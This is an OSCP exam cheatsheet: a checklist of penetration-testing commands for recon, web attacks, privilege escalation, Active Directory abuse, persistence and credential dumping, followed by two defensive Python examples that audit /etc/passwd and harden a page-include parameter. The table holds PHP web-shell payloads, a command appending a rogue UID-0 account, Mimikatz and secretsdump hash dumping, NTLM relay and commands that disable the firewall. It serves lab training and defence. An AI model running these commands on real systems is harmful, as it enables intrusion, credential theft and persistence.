OSCP Cheatsheet
Master methodology checklist for exam and lab workflows
MasterCheck
| Step | Phase | Notes / References | Done |
|---|---|---|---|
| Run Autorecon | Recon | autorecon 192.168.133.12 --nmap-append="--min-rate=20000" --exclude-tags dirbuster; sudo nmap -Pn -n 192.168.200.65 -sC -sV -p- --open | |
| Zone Transfer | Recon | dig axfr @10.10.10.83 ctfolympus.htb; knock -v 10.10.10.83 3456 8234 62431 | |
| Nmap Full TCP Scan | Recon | nmap -p- -sCV -A -Pn <ip addr> --min-rate=20000. SCAN ALL PORTS. Try fingerprinting with -nvv, or connect to the port with nc and see what it returns | |
| Nmap UDP Scan | Recon | Run against discovered subdomains as well. Tools → Nmap | |
| Directory Brute Force | Recon | If a 302 directory is found, ask yourself why it is there; manually scan for default directories related to the service. Tools → Feroxbuster | |
| Gobuster Directory Scan | Recon | Sometimes a different buster exposes more endpoints. Tools → Gobuster | |
| Run Nikto on HTTP | Recon | nikto -h <IP> | |
| Check Page Source and Response Headers | Recon | Ctrl+U; check JS files. Ports → Port 80 | |
| Subdomain Enumeration | Recon | wfuzz -u http://<IP> -H "Host: FUZZ.domain.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt. Tools → Wfuzz | |
| Check robots.txt | Recon | /robots.txt. Ports → Port 80 | |
| Check README | Recon | /README.txt. Ports → Port 80 | |
| Analyze Every Request with Burp | Recon | Test every function of the site for LFI, SQLi, IDOR, mass assignment, business logic | |
| If LFI, File Read or Path Traversal | Recon | Look for a user and try to grab the SSH key from /home/remi/.ssh (https://pwnbase.org/helpers/file-read). Also fuzz for parameters with wfuzz: file.php?FUZZ=../../../../etc/passwd. Check for RFI and SSH; afterwards check /etc/shadow, /proc/self/environ, /var/log/apache2/access.log, /var/log/auth.log → ssh poison & cmd=id; nc -nv $IP 22; omgthisiss/<?php passthru($_GET['cmd']); ?> | |
| TLS/SSL Certificates | Recon | openssl s_client -connect <IP>:<PORT>. Good for grabbing usernames | |
| DNS Enumeration | Recon | nslookup; dig | |
| CVE Enum | Recon | 1. searchsploit (easier than the exploit-db web interface, but keep it updated) and double-check Rapid7. 2. Sploitus. 3. GitHub search (sign in and search for the CVE name or a part of the PoC from searchsploit; you will find all repos that used that part; don't Google-dork it). 4. CVEdetails https://www.cvedetails.com/, OffSec Discord | |
| Check for Version Number Leaks | Recon | Check error pages to see if you can catch the version of the service or framework. Also Google the error | |
| Check for Vulnerabilities in Certain Components | Recon | If you get stuck, Google the kit or package the website uses and look for a vuln | |
| Map Out How the Website Works | Recon | If you get stuck, figure out what the website is doing, AND PLUGINS | |
| Fuzz Parameters | Recon | Fuzz parameters and check for LFI | |
| Custom Wordlist | Recon | cewl http://192.168.213.180:80/ \| grep -v CeWL > wordlist.txt | |
| Use PHP Wrappers | Recon | php://filter for including file contents, and data:// for code exec (the allow_url_include setting from https://www.php.net/manual/en/filesystem.configuration.php needs to be enabled): curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain,%3C?php%20echo%20system(%27ls%27);?>"; echo -n '<?php echo system($_GET["cmd"]);?>' \| base64; curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls". If part of the page is missing when curling it, try this | |
| Check Virtual Hosts | Enumeration | ls /etc/nginx/sites-enabled; ls /etc/apache2/sites-enabled. Check if these two are enabled; they might give us another subdomain | |
| Enumerate Listening Ports | Enumeration | netstat -tulnp. PrivEsc → Network & Pivoting | |
| Check Running Processes | Enumeration | ps -ef --forest. PrivEsc → Network & Pivoting | |
| Check Active Services | Enumeration | ss -lntp; ps aux \| grep -i root \| grep 8080; netstat -ano. Or curl each one: curl -I http://127.0.0.1:7999/; nc -nv 127.0.0.1 3306; nmap -sV -sC 127.0.0.1 -p 1935,7999,3306,8888,8765,9081,33060,8554; grep -R -e 7999 -e 8888 -e 8765 -e 9081 -e 8554 -e 1935 /etc 2>/dev/null; grep -R -e 3306 -e mysql /etc 2>/dev/null | |
| Check Installed Packages and Software | Enumeration | pip3 list; check Program Data, /etc or the Recycle Bin; sometimes in quotes. PrivEsc → Writeable Locations | |
| Examine Binary Content & Check Metadata | Enumeration | Sometimes a weird binary is there with a hardcoded password. Check the metadata of any file you come across | |
| Reuse Passwords and Usernames | Enumeration | Reuse passwords and usernames everywhere | |
| Check if Python Is Installed | Enumeration | python -V 2>&1; python3 -V 2>&1 | |
| Process Enumeration | Enumeration | /proc/self/environ: check this file to see what's running; useful with LFI | |
| Identify Framework | Enumeration | Check for more endpoints or any debugging endpoint related to the framework | |
| Check Root Directories | Enumeration | Manually check /var/www, /home, /root | |
| Check Absolute vs Relative Paths | Enumeration | Look for quotes; manual review. Unquoted Service Paths (https://www.notion.so/Unquoted-Service-Paths-30b1adde3d1780a389daf98304afccef?pvs=21) | |
| SMB Enumeration | Enumeration | smbclient -L //<IP> -N. Check for null auth with netexec smb <IP> -u 'any' -p '' | |
| LDAP Enumeration | Enumeration | ldapsearch -x -h <IP> | |
| Check Config Files & ENV | Enumeration | grep -R "pass" /usr/share/zoneminder 2>/dev/null; env. Check for env variables within the config as well | |
| Check Program Files | Enumeration | Look for 3rd-party applications and .ini files | |
| Check for Database Config | Enumeration | htdocs/conf/conf.php; also salts in C:\xampp\htdocs\blog\boot\defines.php and the hashing algorithm in C:\xampp\htdocs\blog\engine\Security.php. Figure out where the CRM stores its DB creds, or any config file | |
| Check Who Can SSH | Enumeration | /etc/ssh/sshd_config | |
| Check if You Are Using a Blocked Port | Enumeration | Sometimes there are firewalls in place; you have to bypass them by using a different port. Check busybox and use standard service ports, or use the open ports | |
| Easy Quick Grab | PrivEsc | sudo -l and check env | |
| Check for Listening Ports | PrivEsc | netstat -ano | |
| Check for Writeable Files | PrivEsc | Check LinPEAS output for writeable files | |
| Check for Aliases | PrivEsc | idk, just check alias, /proc/self/cmdline; enumerate by user: https://hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#processes | |
| Check .bash_history | PrivEsc | Check .bash_history in each user's directory | |
| Look for Root SSH Key | PrivEsc | If a root key is present under keys, simply ssh -i root root@127.0.0.1 | |
| Analyze Root Processes | PrivEsc | ps aux \| grep root | |
| Check Network Traffic | PrivEsc | tcpdump -i lo -A; sudo tcpdump -i tun0; sudo tcpdump -i lo -A \| grep "pass". Check for credentials getting leaked | |
| Check SUID | PrivEsc | find / -perm -4000 2>/dev/null | |
| Check Capabilities | PrivEsc | /usr/sbin/getcap -r / 2>/dev/null | |
| Check Writable Files | PrivEsc | find / -type f -writable -user www-data 2>/dev/null; find / -writable -type d 2>/dev/null \| grep -v -e '^/proc' -e '^/sys' -e '^/run' | |
| PATH Hijacking Check | PrivEsc | strings <binary>; ltrace <binary>. Analyze any binary you come across | |
| Analyze Binary Execution | PrivEsc | ltrace <binary> | |
| Run LinPEAS | PrivEsc | Go slow: look at crons, SUIDs, users, site config, processes, unusual files, ports, systemd timers; check each cron's contents | |
| Run lse.sh | PrivEsc | With level 1 | |
| Cron Jobs | PrivEsc | If you see a cron job, run pspy and check each directory | |
| Check for Passwords | PrivEsc | grep -r password /var/lib/openfire | |
| Finding a File | PrivEsc | sudo find / -name "local.txt"; sudo find / -name "local.txt" -exec cat {} \; 2>/dev/null | |
| Check Firewall Port Rules | PrivEsc | cat /etc/iptables/rules.v4 | |
| Check for Other Drives | PrivEsc | https://linux.die.net/man/8/lsblk | |
| SQLi Enumeration | Exploitation | pwnbase https://pwnbase.org/tools | |
| Add SSH Persistence | Persistence | mkdir ~/.ssh; ssh-keygen; rename key.pub to authorized_keys and upload it into /home/user/.ssh/; ssh user@<ip addr> -i id_rsa | |
| /etc/passwd Persistence | Persistence | openssl passwd w00t; echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" >> /etc/passwd; su root2 | |
| Find Usernames | | RID brute if users don't work; net user /domain. If you get access, look for usernames with netexec --rid-brute, --users, kerbrute | |
| Check Your Environment with PowerView | | List out your environment with PowerView; refer to the tools page | |
| Check RDP Access (3389) | | nmap -p 3389 <IP> | |
| BloodHound | | Check SPNs of users. If it ever fails: bloodyAD -d pirate.htb -u pentest -p 'p3nt3st2025!' --host dc01.pirate.htb get writable; bloodhound-python -u <user> -p <pass> -dc <IP> -d <domain> -c all; MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p; MATCH (m:Computer) RETURN m. Check outbound object control for each owner you own | |
| LAPS Check | | Check for LAPS passwords: C:\Program Files\LAPS | |
| Check Privileges | | whoami /groups; whoami /priv | |
| Check if Defender Is Active | | reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender"; sc query WinDefend; Get-MpComputerStatus | |
| Check AppLocker Policies | | Get-AppLockerPolicy -Effective | |
| Check Certify & Vulns | | Invoke-WebRequest http://<IP>:8081/Invoke-Certify.ps1 -OutFile Certify.ps1; powershell -ep bypass -c ".\Certify.ps1; Invoke-Certify find /vulnerable"; certipy find -u j.fleischman@fluffy.htb -p 'J0elTHEM4n1990!' -vulnerable -stdout. Check with nxc -M adcs | |
| Check for NTLMv2 | | Use Responder to catch it; check if we can connect back through SMB. If we can't crack it, relay it | |
| NTLM Relay (check if local admin has a session) | | python3 petitpotam.py 10.10.14.5 10.129.231.186; nxc -M ldap-checker; nxc smb <TargetIP> -u 'username' -p 'password' -M coerce_plus if either SMB or LDAP signing is disabled | |
| Run enum4linux | | enum4linux $target \| tee enum4linuxng.log | |
| Check for Possible Subdomains | | dnsrecon -d "EGOTISTICAL-BANK.LOCAL" -n $target | |
| Authenticate with Every Possible Protocol | | Try -k or --local-auth if it's treating it as a domain user; --generate-krb5-file krb5.conf; sudo cp krb5.conf /etc/krb5.conf; kinit f.frizzle; ssh -k f.frizzle@frizzdc.frizz.htb. LOCAL AUTH | |
| Test for Kerberoasting | | Need username and password | |
| Test for AS-REP Roasting | | kerbrute userenum usernames --dc $target -d fusion.corp with a username list; after kerbrute | |
| Check LDAP, RPC, SMB with Anonymous Access and Check for Public Shares | | Check for public shares; recheck shares for every new user. netexec smb $target -u '' -p '' | |
| Scan All TCP Ports & UDP | | | |
| ldapsearch: Check the Info Field for Exposed Creds | | nmap -n -sV --script "ldap* and not brute" -p 389 $target; Apache Directory | |
| Check SYSVOL | | SMB; maybe something useful in the scripts | |
| RID Brute after SMB | | Username enum helps with it: crackmapexec smb $target -u enterprise-core-vn -p 'lalala' --rid-brute | |
| Check if You Can Put Stuff | | https://github.com/Greenwolf/ntlm_theft. Check if you can upload to SMB or put to an FTP webroot, or grab a hash with ntlmrelay | |
| Brute-force Different Protocols | | Also check if the username is the same as the password, lower and upper case. Don't forget every time you get a new cred | |
| Check PowerShell History | | PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> ls | |
| Check All Installed Applications | | First Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" \| select displayname, then Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" \| select displayname. Check 32- and 64-bit Program Files and the Downloads directory as well | |
| Check Running Processes and Services | | Get-Process; Get-CimInstance -ClassName win32_service \| Select Name,State,PathName \| Where-Object {$_.State -like 'Running'}, then use icacls to check perms. Check its start mode: Get-CimInstance -ClassName win32_service \| Select Name, StartMode \| Where-Object {$_.Name -like 'mysql'} | |
| Check for Quoted and Unquoted Paths | | wmic service get name,pathname \| findstr /i /v "C:\Windows\\" \| findstr /i /v """, then Start-Service GammaService and stop it | |
| Check for Scheduled Tasks | | schtasks /query /fo LIST /v; Get-ScheduledTask \| where {$_.TaskPath -notlike "\Microsoft*"} \| ft TaskName,TaskPath,State | |
| Check for Strange EXEs and Whether They Are Bound to a Service | | Get-Service \| findstr /i audit; sc query \| findstr /i "audit". Is it a service? A scheduled task? A startup program? | |
| Check for Config Files | | Get-ChildItem -Path C:\users\ -Include *.kdbx,*.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.rar,*.zip,*.7z -File -Recurse -ErrorAction SilentlyContinue. Kdbx files in C: Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue. Config files in the xampp folder: Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue. Config files in home: Get-ChildItem -Path C:\Users\dave\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue | |
| BloodHound | | -just-dc-ntlm | |
| WinPEAS | | Check hostname also; run as admin again. Check your permissions, then PowerUp.ps1, then WinPEAS | |
| Windows Exploit Suggester | | Run it; local exploit suggester | |
| Dump Hashes Remotely | | netexec smb $target -u Admin -H <NT part of the hash> --ntds or --lsa. Add the user to the admin group and then dump remotely. CAN ONLY DUMP NTDS ON DC | |
| Run secretsdump | | When you have domain admin: impacket-secretsdump -just-dc-ntlm vulnnet-rst.local/whitehat:akdfjakfaklf@$target | |
| Check for Administrator User | | net user /domain | |
| Check Listening Ports | | | |
| Run PowerUp.ps1, PrivescCheck.ps1 and then WinPEAS | | | |
| Run whoami /all | | Easy wins | |
| Pivot Check | | If you need to pivot, relay all tools through the jumpbox. Check for additional network adapters after you are in: for i in {1..254}; do (ping -c 1 192.168.1.$i \| grep "bytes from" &); done; nslookup WEB01.pirate.htb 10.129.3.153 | |
| Responder | | Check if a writeable share could be a path to steal hashes with Responder | |
| Check Tasks | | tasklist /v | |
| Check Interesting Files | | C:\>findstr /SIM /c:"pass" *.ini *.cfg *.xml | |
| Check XAMPP | | Check C:\xampp\properties.ini and check / | |
| Extra | | Try a staged payload with msfvenom and try powershell -ep bypass C:/lalal | |
| Check for Certificate-based Attacks | | Certipy | |
| Shell as New User | | Dump all hashes and collect them in a file | |
| GPP Abuse | | dir \\<domain>\SYSVOL\<domain>\Policies\ /s /b \| findstr cpassword. Check for cpassword in SYSVOL | |
| If All Else Fails, Then Kernel | | systeminfo, then check for exploits. Use this to check the patches: Get-CimInstance -Class win32_quickfixengineering \| Where-Object { $_.Description -eq "Security Update" } | |
| Disable Defender (Admin) | | Disable if admin | |
| Disable AMSI (Admin) | | Bypass if needed | |
| Disable Firewall | | netsh advfirewall set allprofiles state off | |
| Enable RDP | | netexec smb $IP -u administrator -p pass123 -M rdp -o ACTION=enable | |
| Check Stored Credentials (Windows) | Credential Access | cmdkey /list. PrivEsc → Windows | |
| Dump Hashes (SMB) | Credential Access | nxc smb <IP> -u <user> -p <pass> --sam. Only works if the user is pwned! | |
| Run Mimikatz | Credential Access | sekurlsa::logonpasswords | |
| Grab Hashes | Credential Access | cat /etc/passwd | |
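The "/etc/passwd Persistence" and "Grab Hashes" rows both come down to one file. From the defender's side the same file is also the cheapest place to spot that persistence: an appended UID-0 account with a crypt hash sitting directly in the password field (modern systems keep only "x" there and put the hash in /etc/shadow). The following audit script is an added example written for this page, not something from the cheatsheet or from any tool it names; the `Finding` type, `audit_passwd` function and the sample passwd text are constructed for the example and include the exact line the checklist appends.

```python
"""Audit an /etc/passwd file for the persistence pattern described above:
an extra UID-0 account with an inline crypt hash. Added example; not from
the original cheatsheet."""
import sys
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class Finding:
    line_no: int
    user: str
    reason: str


# Password-field values that mean "hash lives in /etc/shadow" or "locked".
# Anything else is a hash stored inline, which a current system should not have.
SHADOW_MARKERS = {"x", "*", "!", "!!", ""}


def audit_passwd(text: str) -> List[Finding]:
    """Return one Finding per suspicious property of each passwd entry."""
    findings: List[Finding] = []
    seen_uids: Dict[int, str] = {}
    for n, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(Finding(n, line[:32], "malformed entry (expected 7 fields)"))
            continue
        user, pw, uid, _gid, _gecos, _home, _shell = fields
        if not uid.isdigit():
            findings.append(Finding(n, user, "non-numeric UID"))
            continue
        uid_n = int(uid)
        if uid_n == 0 and user != "root":
            findings.append(Finding(n, user, "UID 0 account other than root"))
        if pw not in SHADOW_MARKERS:
            findings.append(Finding(n, user, "password hash stored inline in /etc/passwd"))
        if uid_n in seen_uids:
            findings.append(Finding(n, user, f"duplicate UID {uid_n} (also used by {seen_uids[uid_n]})"))
        else:
            seen_uids[uid_n] = user
    return findings


# Constructed sample file; the last line is the one the checklist appends.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
remi:x:1000:1000:remi:/home/remi:/bin/bash
root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash
"""


if __name__ == "__main__":
    # Pass a path (e.g. /etc/passwd) to audit a real file; default is the sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PASSWD
    for f in audit_passwd(text):
        print(f"line {f.line_no}: {f.user}: {f.reason}")
```

On the sample, every finding points at `root2`: it is a second UID-0 account, it carries an inline hash, and it duplicates root's UID. A clean file returns an empty list, which makes the function easy to drop into a periodic integrity check alongside a hash of the file itself.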
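The "If LFI, File Read or Path Traversal" and "Use PHP Wrappers" rows both exploit the same server-side mistake: a `page` parameter handed straight to an include with no validation, so `../../../../etc/passwd` and `data://` or `php://filter` strings pass through. Setting `allow_url_include` to Off blocks the wrapper half; the code below shows the traversal half too, as an added example written for this page in Python as a stand-in for the PHP include (it is not the page's or any project's code). `PAGES_DIR`, `resolve_page_vulnerable`, `resolve_page_hardened` and `classify` are names chosen for the example.

```python
"""A `page` parameter resolver: the unchecked version beside a hardened one.
Added example for this page; Python stand-in for a PHP include()."""
import re
from pathlib import Path

# Hypothetical directory that is the only legitimate source of includes.
PAGES_DIR = Path("/tmp/pages_demo").resolve()

# Matches a URL-style scheme prefix: php://, data://, file://, expect:// ...
_SCHEME = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*:")


def resolve_page_vulnerable(page: str) -> str:
    """Mirrors include($_GET['page']) with no checks.

    Wrapper strings are returned untouched and '..' segments are kept, so
    both attack classes from the checklist rows pass straight through.
    """
    if _SCHEME.match(page):
        return page
    return str(PAGES_DIR / page)


def resolve_page_hardened(page: str) -> Path:
    """Return a path inside PAGES_DIR, or raise ValueError.

    Three independent layers: no scheme prefix (defeats php://, data://),
    an allow-list of page names (defeats '..' and NUL tricks), and a
    realpath check so a symlink inside PAGES_DIR cannot lead outside it.
    """
    if _SCHEME.match(page):
        raise ValueError("stream wrappers are not allowed")
    if "\x00" in page:
        raise ValueError("NUL byte in page name")
    if not re.fullmatch(r"[A-Za-z0-9_-]+(\.php)?", page):
        raise ValueError("page name must be a plain identifier")
    candidate = (PAGES_DIR / page).resolve()
    if candidate.parent != PAGES_DIR:
        raise ValueError("path escapes page directory")
    return candidate


def classify(page: str) -> str:
    """Convenience wrapper for logging or tests: 'allowed' or the rejection reason."""
    try:
        resolve_page_hardened(page)
        return "allowed"
    except ValueError as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    # Constructed inputs: a normal page, a traversal string and two wrappers.
    for p in ["about", "../../../../etc/passwd",
              "php://filter/convert.base64-encode/resource=index",
              "data://text/plain,x"]:
        print(f"{p!r:55} vulnerable={resolve_page_vulnerable(p)!r:60} hardened={classify(p)}")
```

Rejecting by allow-list rather than by stripping `../` is the point: a deny-list can be bypassed by encoding, while an identifier pattern leaves nothing to bypass. The realpath check is deliberately redundant with the allow-list; it stays because the allow-list may be loosened later to admit subdirectories.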